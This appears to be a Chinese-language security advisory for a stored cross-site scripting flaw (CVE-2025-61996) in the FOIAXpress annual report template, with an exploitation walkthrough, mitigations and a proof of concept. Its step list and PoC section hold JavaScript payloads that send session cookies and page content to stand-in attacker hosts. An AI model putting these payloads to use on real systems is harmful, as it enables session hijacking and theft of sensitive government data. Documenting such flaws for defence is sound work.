CVE-2025-61996：OPEXUS FOIAXpress年度报告模板存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61996

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

OPEXUS FOIAXpress

漏洞概述

CVE-2025-61996是OPEXUS FOIAXpress信息自由法（FOIA）管理软件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响FOIAXpress 11.13.3.0之前的所有版本。FOIAXpress是一款广泛应用于政府机构的信息自由法请求处理和管理平台，用于处理公众的信息公开申请、文档管理和报告生成。

该漏洞位于年度报告模板（Annual Report Template）功能中，允许具有管理员权限的用户在模板中注入恶意的JavaScript代码或其他HTML内容。注入的恶意内容将被持久化存储在服务器端，当其他用户（可能包括其他管理员或具有查看报告权限的用户）生成年度报告时，浏览器将执行嵌入在模板中的恶意脚本。由于脚本在受害用户的会话上下文中执行，攻击者可以窃取会话Cookie、用户凭证或敏感数据，并代表受害用户执行操作。

该漏洞的CVSS 3.1评分为4.3，属于中等严重级别。虽然攻击需要管理员权限（PR:H）且需要用户交互（UI:R），但一旦管理员被攻击者控制或内部威胁场景下，可能导致严重的安全后果，包括数据泄露、会话劫持和权限提升等。

技术细节

该漏洞的根本原因在于FOIAXpress年度报告模板功能未对用户输入的内容进行充分的过滤和转义处理。具体而言，当管理员编辑年度报告模板时，系统允许在模板中嵌入原始的HTML和JavaScript代码而未进行适当的输出编码（Output Encoding）或内容安全策略（CSP）保护。

漏洞利用流程如下：
1. 攻击者（具有管理员权限）登录FOIAXpress管理后台
2. 导航至年度报告模板编辑功能
3. 在模板字段中注入恶意JavaScript代码，例如：<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>
4. 保存包含恶意代码的模板
5. 当其他用户（如其他管理员、报告生成人员）生成年度报告时，服务器返回包含恶意脚本的模板内容
6. 受害者的浏览器解析并执行嵌入的JavaScript代码
7. 恶意脚本在受害者会话上下文中运行，可窃取Cookie、凭证或执行其他恶意操作

该漏洞属于存储型XSS（也称为持久型XSS），因为恶意代码被持久化存储在服务器端模板中，影响所有后续访问该模板生成报告的用户。由于FOIAXpress通常处理敏感的政府信息，成功的利用可能导致敏感数据泄露。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者需要先获取FOIAXpress系统的管理员权限，可以通过社会工程、凭证填充或利用其他漏洞实现

STEP 2

步骤2：访问年度报告模板

攻击者以管理员身份登录系统，导航至年度报告模板编辑页面

STEP 3

步骤3：注入恶意脚本

在年度报告模板的输入字段中注入恶意JavaScript代码，如Cookie窃取脚本或凭证收集器

STEP 4

步骤4：保存恶意模板

将包含恶意代码的模板保存到服务器，由于缺乏输入过滤，恶意内容被持久化存储

STEP 5

步骤5：触发漏洞

当其他用户（管理员或报告查看者）生成年度报告时，恶意脚本在受害者浏览器中执行

STEP 6

步骤6：数据窃取与权限滥用

恶意脚本窃取受害者的会话Cookie、凭证或敏感数据，攻击者可利用窃取的会话执行任意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61996 PoC: OPEXUS FOIAXpress Stored XSS in Annual Report Template -->
<!-- Step 1: Login to FOIAXpress admin panel as an administrator -->
<!-- Step 2: Navigate to Annual Report Template configuration -->
<!-- Step 3: Inject the following malicious payload into the template field: -->

<script>
  // Steal session cookies and send to attacker server
  var cookie = document.cookie;
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?c=' + encodeURIComponent(cookie);
  
  // Alternatively, exfiltrate sensitive page content
  var data = {
    cookies: document.cookie,
    url: window.location.href,
    content: document.body.innerText.substring(0, 500)
  };
  fetch('https://attacker.example.com/exfil', {
    method: 'POST',
    body: JSON.stringify(data)
  });
</script>

<!-- Step 4: Save the template -->
<!-- Step 5: When any user generates an Annual Report, the script executes in their browser context -->

影响范围

OPEXUS FOIAXpress < 11.13.3.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）严格限制年度报告模板的编辑权限，仅授权可信的管理员操作；2）在Web代理或WAF层面部署XSS过滤规则，阻止常见的脚本标签和事件处理器；3）监控模板修改日志，及时发现可疑的注入行为；4）启用会话超时和重新认证机制，减少会话劫持的影响窗口；5）使用HTTPOnly Cookie属性保护敏感会话信息。